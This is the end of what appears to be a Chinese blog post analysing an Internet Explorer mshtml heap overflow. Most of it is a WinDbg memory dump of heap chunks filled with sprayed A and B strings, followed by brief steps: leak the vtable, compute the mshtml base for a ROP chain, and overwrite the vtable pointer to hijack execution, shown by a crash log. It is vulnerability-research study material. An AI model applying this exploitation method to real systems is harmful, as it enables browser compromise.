03f2b1c0  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b1d0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1e0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b200  00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03  ............(...
03f2b210  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b220  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b230  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b240  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b270  00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2  ........f.......
03f2b280  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b290  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b2a0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b2b0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b2c0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b2d0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b2e0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b2f0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b300  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b310  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b320  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b330  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b340  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b350  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b360  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b370  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b380  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b390  5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  [........a......
03f2b3a0  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b3b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b400  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b410  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b420  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b430  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b440  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b450  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b460  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b470  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b480  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b490  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b4a0  41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2  A.A.A...........
03f2b4b0  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b4c0  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b4d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b500  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b510  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b520  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b530  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b540  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b550  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b560  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b570  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b580  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b590  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b5c0  91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b5d0  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b5e0  e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  .....<.h........
03f2b5f0  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b600  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b620  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b650  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b660  00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03  ................
03f2b670  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b680  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b690  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6a0  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b6b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6c0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6d0  00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2  ................
03f2b6e0  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b6f0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b700  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b710  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b720  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b730  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b740  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b750  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b760  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b770  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b780  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b790  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b7a0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b7b0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b7c0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b7d0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b7e0  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b7f0  d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2b800  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b810  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b820  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b830  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b840  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b850  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b860  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b870  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b880  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b890  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8a0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b900  41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2  A.A.A...........
03f2b910  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b920  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b930  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b940  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b950  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b960  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b970  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b980  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b990  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2ba20  6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  m........j......
03f2ba30  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2ba40  50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  P....<.h........
03f2ba50  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2ba60  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2ba70  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2ba80  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2ba90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bab0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bac0  00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03  ................
03f2bad0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bae0  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baf0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb00  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2bb10  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb20  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb30  00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2  ........N.......
03f2bb40  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2bb50  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bb60  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bb70  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bb80  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bb90  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bba0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bbb0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bbc0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bbd0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bbe0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bbf0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bc00  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bc10  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bc20  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bc30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bc40  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2bc50  a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2bc60  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2bc70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc80  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc90  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bca0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcb0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcc0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcd0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bce0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcf0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd60  41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2  A.A.A...........
03f2bd70  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2bd80  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2bd90  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bda0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdb0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdc0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdd0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bde0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdf0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be20  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be30  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be40  42 00 42 00 42 00 42 00-42 00 42 00              B.B.B.B.B.B.

很简单的能观察到03f2ae30的AAAA字符串被大量覆盖,所以它就是vulheap。得到虚表地址后,计算mshtml基地址,构造rop。然后再次溢出,这次溢出直接像刚刚覆盖BBBB的大小一样,直接覆盖虚表指针,于是就可以劫持虚表指针到任意地址,如下

(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024--->控制虚表指针 ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
003d006b 777a            ja      003d00e7                                [br=1]

到此,这个洞的分析就结束了。

参考资料

《漏洞战争》

WinDbg漏洞分析调试(一):https://paper.seebug.org/179/

发布了93 篇原创文章 · 获赞 82 · 访问量 7万+
展开阅读全文
评论将由博主筛选后显示,对所有人可见 | 还能输入1000个字符

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 技术黑板 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览